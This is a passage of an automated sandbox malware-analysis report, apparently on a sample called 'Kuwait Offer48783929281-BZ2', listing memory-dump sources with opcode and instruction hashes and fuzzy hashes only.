                                          • Instruction Fuzzy Hash: 7231E1B0D15219DFDB84CFA9D944AEEBBF6BB89304F118169D809B3350D7384A41EF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84f54ae511be2091d2833bb70caa47c6c3df58e005dfe045552187b19e6c065a
                                          • Instruction ID: eee3b111617cced1199aac795c2532f7a6666399245ae5018f30851224ce421f
                                          • Opcode Fuzzy Hash: 84f54ae511be2091d2833bb70caa47c6c3df58e005dfe045552187b19e6c065a
                                          • Instruction Fuzzy Hash: D221AD34A00254DFD745DF6DC458AAEBBB6EF89714F15806EE402AB3A2CF749C05CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4ddffdf6f8c6e8e288c3268a0aa2154473ed178b371a8f6384065921286f9bf8
                                          • Instruction ID: c05ca74c666c0c4bd00c00ff2d45a9d4aaa22c8484607f3b8f425278e46182f0
                                          • Opcode Fuzzy Hash: 4ddffdf6f8c6e8e288c3268a0aa2154473ed178b371a8f6384065921286f9bf8
                                          • Instruction Fuzzy Hash: F0213A32829221DBEF15FFBCE8A0BCA7BD5DF89221F144193C8808B105D8604959C7DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a467c2e6ebd68ef4eec186aa0d6f6b2454246f963de50f0c7f8f46bb1ca429d2
                                          • Instruction ID: 30c4060bb6148efa710be9750311a66dd39990e5e4c9c6974bc0aba06a26ccc4
                                          • Opcode Fuzzy Hash: a467c2e6ebd68ef4eec186aa0d6f6b2454246f963de50f0c7f8f46bb1ca429d2
                                          • Instruction Fuzzy Hash: C031E2B0D05219DFDB84CFA9D944AEDBBFABB89304F118169D809B3350D7385A40EF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56d27deaa9bda8bd5eeb92bf4b95d26ba676d8bd7405e71da24fd72771d949fb
                                          • Instruction ID: 283de348716b269f75792893a5ce8b8787150cbe2e3e207cf10a222c598d9011
                                          • Opcode Fuzzy Hash: 56d27deaa9bda8bd5eeb92bf4b95d26ba676d8bd7405e71da24fd72771d949fb
                                          • Instruction Fuzzy Hash: 35218874B10A19CFCB44EF68D5544AEBBB5FF89700F10412AD51697364EF309A06CBE5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23171b95f0db296d1596b6685b95ed231a0bccb4720d7731cf301926ee4aea3b
                                          • Instruction ID: 0685abff4a2597d19a7547ddf8e1d601675ef6ba47e95314814b6bc515cd27d7
                                          • Opcode Fuzzy Hash: 23171b95f0db296d1596b6685b95ed231a0bccb4720d7731cf301926ee4aea3b
                                          • Instruction Fuzzy Hash: C1212C36A01114AFCB05CF99D888D99BFB2FF49320B0640A9F6099B372C731EC15DB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c26a56b9009fb9935f2235d1ece4cb8fdccd3222713125fbb6a52e35d1dffff6
                                          • Instruction ID: 008c942715fef31dc7a368396323b8cbc3306b4612226ac37d742263855e363b
                                          • Opcode Fuzzy Hash: c26a56b9009fb9935f2235d1ece4cb8fdccd3222713125fbb6a52e35d1dffff6
                                          • Instruction Fuzzy Hash: FE219035F102258B8B909EB9D8804BEF3A9FBC5261B104976E91AD7340DF35D925C7E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bdeee312b5f26f648f46bcc7805b798bd16d87cf7329f1b55209408daf4d60a1
                                          • Instruction ID: 3e177d5deb39fac880701e40680e60069da0ca35ff9d6f50068115b30e463a5c
                                          • Opcode Fuzzy Hash: bdeee312b5f26f648f46bcc7805b798bd16d87cf7329f1b55209408daf4d60a1
                                          • Instruction Fuzzy Hash: BE112122829394CFDB52FBBCA850ADA7FB59F07210F1105ABCD80CB143D860495AC3E6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3fb027dc5920ce9b254e0aa10c657f3edbddae81076c2fc02fe8292632d86e9
                                          • Instruction ID: ec1289f3f83e12760a58472b040b95b72dda58502c712da8e96fcaca9aa9269f
                                          • Opcode Fuzzy Hash: a3fb027dc5920ce9b254e0aa10c657f3edbddae81076c2fc02fe8292632d86e9
                                          • Instruction Fuzzy Hash: 80212A71E00229DFEB90DF78C944BAEBBF4AB49380F508066D516DB390E734DA55CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347561583.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_137d000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c66111f0dfa785ad9540acad7cd054cd8535dac5b3ec1b0f4db7deb74cdc4e7e
                                          • Instruction ID: cabd4d98e125c0ebaadc0e95f0ff7a4a9eedba59acf1cd655d9a687b577f9041
                                          • Opcode Fuzzy Hash: c66111f0dfa785ad9540acad7cd054cd8535dac5b3ec1b0f4db7deb74cdc4e7e
                                          • Instruction Fuzzy Hash: 362137B1504204DFDB26DF54E9C4B26BF65FF84318F20C169D8091B246C33AD816CBA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 28854a1aa63870b51dea9f7035a10a5edb1274c2c6591f61618f5ec4ea6a3eb3
                                          • Instruction ID: ffc0cf5b01f47fdf8d45c8c99ebf1280c0675c7976e714db83949a0da426b036
                                          • Opcode Fuzzy Hash: 28854a1aa63870b51dea9f7035a10a5edb1274c2c6591f61618f5ec4ea6a3eb3
                                          • Instruction Fuzzy Hash: C43128B0D05208DFDB50EFA8C1487ADBBF9FF4A709F1084A9D509A3649EB784A859F11
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365450801.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6310000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ee2230650b9ddbbfc95ac00a6dc3e1fa576d732a751dd335d5fbcf752ae679e
                                          • Instruction ID: 4b0fd9c370db44e9071d661d1d3395d97f1a2ff1c1fbecc018b46fdc99504222
                                          • Opcode Fuzzy Hash: 2ee2230650b9ddbbfc95ac00a6dc3e1fa576d732a751dd335d5fbcf752ae679e
                                          • Instruction Fuzzy Hash: 80314830D08259CFDB59CFA9D8146EEBBB5EF46301F00806AD516AB291DB385A85CFD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ce61f9e93dc55aeb92e87a9e7c9c2c171748c2606783cf2dadf70a1b0af3a3f
                                          • Instruction ID: 9fd2a0abcb0d19991533571a6669ccc8ab2b2d715003fef4a9605b4b810a94ce
                                          • Opcode Fuzzy Hash: 8ce61f9e93dc55aeb92e87a9e7c9c2c171748c2606783cf2dadf70a1b0af3a3f
                                          • Instruction Fuzzy Hash: 8D21B234A08314DFDB06DFA8C494ADD7BB2FF89320F15555AD611AB391CB308945CB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6990cb3df80dd116988c6a87593cb43097488fb728d728040521dfdf7e54b74
                                          • Instruction ID: e6e6dde941df1c5a699145754b8569e45d24aa5205dd7d1fedf8b86455407c02
                                          • Opcode Fuzzy Hash: f6990cb3df80dd116988c6a87593cb43097488fb728d728040521dfdf7e54b74
                                          • Instruction Fuzzy Hash: 012102B8D1600CAFC7549F64ECA4ADAB7BDFB4A344F415499EA07B7240D63489468FE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0ec8a0ab40545cffea4684d80e193355accc20394dc6f629a2c962b6a470a59
                                          • Instruction ID: c8d728f3eb8d46df2520a92c66260a268ceac803b68c839d0b25d86627a93951
                                          • Opcode Fuzzy Hash: f0ec8a0ab40545cffea4684d80e193355accc20394dc6f629a2c962b6a470a59
                                          • Instruction Fuzzy Hash: 8921F2306103019FDB10AB79D8597AFBBEAEF85300F00962DD20ADB685DFB59905C7D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79883147717b85cd4a5fd25f5542cd5a25d899fc4d289910b11483bda8b323e8
                                          • Instruction ID: 7d6db4a3c12cea6d29ffc4d66eddd69d9131e54ca49cca2a49fcef03a8274cc9
                                          • Opcode Fuzzy Hash: 79883147717b85cd4a5fd25f5542cd5a25d899fc4d289910b11483bda8b323e8
                                          • Instruction Fuzzy Hash: D2310371A10219DFCB05EFA8D844AEEBBB6FB89314F00816AE805A7250CB356D55DFA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347561583.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_137d000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7218a39f66af96450535b2845524e99409af62c561482fc2e07eb1e7d3a7fc57
                                          • Instruction ID: 4be212bffc69ea762cbee83a7c3202605dd29cafbeb4060ac9c43fec0b7a6ae1
                                          • Opcode Fuzzy Hash: 7218a39f66af96450535b2845524e99409af62c561482fc2e07eb1e7d3a7fc57
                                          • Instruction Fuzzy Hash: FB215A7550D3C08FDB13CF64D990715BF71AF46214F2981EBD8888B6A7C33A981ACB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9aae2b2a9c5a2269640a5d1ad5457ab0166d6ff26cd0ac2f6d3f207d99e2093c
                                          • Instruction ID: 7fd86ab70bcc1d2f64c4460bdc1c98974f454ad2804161ee7e8cea84787f07f0
                                          • Opcode Fuzzy Hash: 9aae2b2a9c5a2269640a5d1ad5457ab0166d6ff26cd0ac2f6d3f207d99e2093c
                                          • Instruction Fuzzy Hash: CE213970D05208EFCB84DFA8D880BADBBF5EF86300F1584AAC84AA7751D7755E84DB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a4bb95476cca040f343d64ba2538c939803e3fbe1a648735a56ff374d42c6d9
                                          • Instruction ID: eeabe8ddaf5ad81fb4a2eb2253167c78d09ee22296329aa86dc59ade02748630
                                          • Opcode Fuzzy Hash: 6a4bb95476cca040f343d64ba2538c939803e3fbe1a648735a56ff374d42c6d9
                                          • Instruction Fuzzy Hash: F6210471A00219DFDB54DF98C994ADDB7F2FB88300F2045A9E505AB3A1CB75AD45CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 528a15d0f0734d9f7cac2338d3532642d3573a610f015ba7dfc082e6a50e5b91
                                          • Instruction ID: 7ec6a6e3b165c6da203c2dbe4a0c9f6e70874ddb55f51e3f32a818dedf2a11d2
                                          • Opcode Fuzzy Hash: 528a15d0f0734d9f7cac2338d3532642d3573a610f015ba7dfc082e6a50e5b91
                                          • Instruction Fuzzy Hash: 4E2157B0E05209DFEB54DFA9C045ABEBBB6FB48340F1181A9C815A3240EB349985CFD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 106c64ddee8adbffd8503233b7b692753dcc24e5475404d5c95a0508929fa0d5
                                          • Instruction ID: 7006a6b8e1bc5a82d666cd20497c4c60b98bfc8323bb468c759164e946af2f14
                                          • Opcode Fuzzy Hash: 106c64ddee8adbffd8503233b7b692753dcc24e5475404d5c95a0508929fa0d5
                                          • Instruction Fuzzy Hash: 18215E30700114DFD704EF6EC458AAEBBE6EF88714F15806DE506AB361CE759C45CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60d9b58f1217be144892ad3a29f717729fb9e9ff95d43f36d4283f719839bd1f
                                          • Instruction ID: fbe4820b6798f2f37a6071dbad893dc25a775d3cf54fc83a73ce65ffaf35e8ed
                                          • Opcode Fuzzy Hash: 60d9b58f1217be144892ad3a29f717729fb9e9ff95d43f36d4283f719839bd1f
                                          • Instruction Fuzzy Hash: 50219F70D14248CFDB54CF68D854BEEBBFAEB8A304F0094A9DA0AA3285CB340945CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a65faf659d68b7b797f2648a8d7b09fd29848d768566376a3320c3b48267e15a
                                          • Instruction ID: ad264477735cc5d47d95d00cb09e7299aa5955c716b1c5d9d2f651b7507bc5b5
                                          • Opcode Fuzzy Hash: a65faf659d68b7b797f2648a8d7b09fd29848d768566376a3320c3b48267e15a
                                          • Instruction Fuzzy Hash: 38118E35B00115CFCB94CF68D9849AAB7F1FF89620B1140A9E906DB321CB31EC12CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 078629fec2a94ad281692ea08c81bea6aba085002a43c91cb3bdb17c3c110d9c
                                          • Instruction ID: d0a13693c977cf58903b051e6bf1c74a2950d6ed69e548486ac49b446c3e1d8e
                                          • Opcode Fuzzy Hash: 078629fec2a94ad281692ea08c81bea6aba085002a43c91cb3bdb17c3c110d9c
                                          • Instruction Fuzzy Hash: 6C2126B4910109DFDB64DF58D894BEDBBB6FB4A308F0054A9DA0AB7684DB345D848FA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a10d8e189e8b79df679a94cc319aed527bb1d94c1b8d7942268664090608056f
                                          • Instruction ID: 409e157e7ca0ad42cbdab18fd7121de8e8a6f320f261af405390fe43936d6a66
                                          • Opcode Fuzzy Hash: a10d8e189e8b79df679a94cc319aed527bb1d94c1b8d7942268664090608056f
                                          • Instruction Fuzzy Hash: 4721F2B4A11218CFCB60DF58D894BEDB7B6FB4A304F0045A9EA0AA7384D7385D848F81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e115fcaa0f3782e8a8dfaae00eb115cb4bca7ce8fe7c66cfd3d2e58dc8d11cf8
                                          • Instruction ID: 781e386609c55dc266239f54ce980fa5bfa7dbcef50b9942ebdfd357278b4ed1
                                          • Opcode Fuzzy Hash: e115fcaa0f3782e8a8dfaae00eb115cb4bca7ce8fe7c66cfd3d2e58dc8d11cf8
                                          • Instruction Fuzzy Hash: 70213674D10108DFDB54DF68D894BEDB7BAFB4A304F0045A9DA0AA7340CB385D888F81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c98c476612c5f1ab744914e14e09f1634e8574c3c9f68f4272122cd6b6ad691
                                          • Instruction ID: d74576fd73bd90255222ffb1ac276ca461724357183ead282bec857262267806
                                          • Opcode Fuzzy Hash: 0c98c476612c5f1ab744914e14e09f1634e8574c3c9f68f4272122cd6b6ad691
                                          • Instruction Fuzzy Hash: E011E731A44319EFEB64CF99D460BE9BBFCAF85314F1540AAE040D7261D730DA80C751
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ca2cb9e79135e4b8d11d85ed7badf347f4d938b45e75c8184be70ca936071ca
                                          • Instruction ID: c9d0cb26d48bc5183dac0e69e5e4583bfacbc773dc802c5a63156a0aa2c4408b
                                          • Opcode Fuzzy Hash: 5ca2cb9e79135e4b8d11d85ed7badf347f4d938b45e75c8184be70ca936071ca
                                          • Instruction Fuzzy Hash: 7321F3B4D11118DFDB54DFA8D894BDDBBB6FB49304F1005A99A0AB7280CA385D848F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82836b9a72f8f339932d88ebd14d0c4a6e36505795d5f444dba0794333a224b5
                                          • Instruction ID: 0ea5681b538dc84cd1125548e0c0eec4bd731f25d7809b9fba6a5cc6edbbb575
                                          • Opcode Fuzzy Hash: 82836b9a72f8f339932d88ebd14d0c4a6e36505795d5f444dba0794333a224b5
                                          • Instruction Fuzzy Hash: 0111D034B102049FCBA0CF68C854BBA7BF6AF88300F19402EEA45D7280DA70C941CBE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3897aa610e6302675863e91aa8acec740c36b8471f43da8f088426bcf61394bf
                                          • Instruction ID: aab388b78d8d4ac6703d01e914ab2c74312da800e192e9b2c88f4ab874a155e6
                                          • Opcode Fuzzy Hash: 3897aa610e6302675863e91aa8acec740c36b8471f43da8f088426bcf61394bf
                                          • Instruction Fuzzy Hash: AB118CB0D1420CCFE754DF69D854BEEB7FAEB8A304F0084A99A0AA3284CB3419448F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71227da9eed316bf9079fb924b3a78336854b4ade378be7ecc23d2585130696c
                                          • Instruction ID: 04cfc84f61043e69f9ed860b7d8a0ae07add09688a2164245a61d4095c21b119
                                          • Opcode Fuzzy Hash: 71227da9eed316bf9079fb924b3a78336854b4ade378be7ecc23d2585130696c
                                          • Instruction Fuzzy Hash: EC114C35A05205CFCB14DF69D89496ABBF6EF85300F1580AAEA019B366DB70EC40CBD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cb9f8821561bf8448c099aa2cf0507c8fa8cbc555041dd710aef093ef3e5be2
                                          • Instruction ID: 0d8e35b3ca7c3853df1ac3e3ee872e2a3a596175799897e88325a55739609a41
                                          • Opcode Fuzzy Hash: 5cb9f8821561bf8448c099aa2cf0507c8fa8cbc555041dd710aef093ef3e5be2
                                          • Instruction Fuzzy Hash: EB2125B4E10118DFD758DF68D894AEDB7FAFB89304F0094A9DA0AB7644DB345D858F80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0815b737c434d57876f2d4dee45269ee84b7b0d9ff2bd659fcb52ad5ee8c4c4
                                          • Instruction ID: 7ab083a755c162f43cc04d09ed5600f180e11f10c419529f8ba3a75c662de5e4
                                          • Opcode Fuzzy Hash: a0815b737c434d57876f2d4dee45269ee84b7b0d9ff2bd659fcb52ad5ee8c4c4
                                          • Instruction Fuzzy Hash: A02134B4D01108DFDB14DF68D894AECB7BAFB8A304F0044A9DA0AB7380CA385D848F90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ace14db7fde98c106415685e7f77a6b58cbd01d699bea98dea42604a56a1fbed
                                          • Instruction ID: 1b4953afde8bce951dbb0ba7409c22d5e1794072b065a9f5d399d536c1cf7205
                                          • Opcode Fuzzy Hash: ace14db7fde98c106415685e7f77a6b58cbd01d699bea98dea42604a56a1fbed
                                          • Instruction Fuzzy Hash: DC2103B8900108DFD764DFA8D894BEDB7BAFB49309F004499DA0AB7280CB385C84CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51958831e94d35ea6f8e53f0b51fcdc0dc1d3f849ef6ebcea8b62ff1ee0d3ec1
                                          • Instruction ID: 886c98eddb28d4de4a1ab590868bbcacc44f192f6e081a501e30fcb72714d55d
                                          • Opcode Fuzzy Hash: 51958831e94d35ea6f8e53f0b51fcdc0dc1d3f849ef6ebcea8b62ff1ee0d3ec1
                                          • Instruction Fuzzy Hash: F721E674D14218DFD754DF58D898BEDB7BAFB8A305F004499DA0AA7384C7385D848F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f1125b5d0f7970c2caf3964ad8ae796d66fade95c5f2e17f186a608e13a7a67
                                          • Instruction ID: 9d4aa092997cf967cda6a0b3614d9bac2ac99254c9b2dac5322ab3be6e018029
                                          • Opcode Fuzzy Hash: 3f1125b5d0f7970c2caf3964ad8ae796d66fade95c5f2e17f186a608e13a7a67
                                          • Instruction Fuzzy Hash: FA21F874E10118DFD754DF58D894BEDB7BAFB49314F005499DA0AB7284CB345D848F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
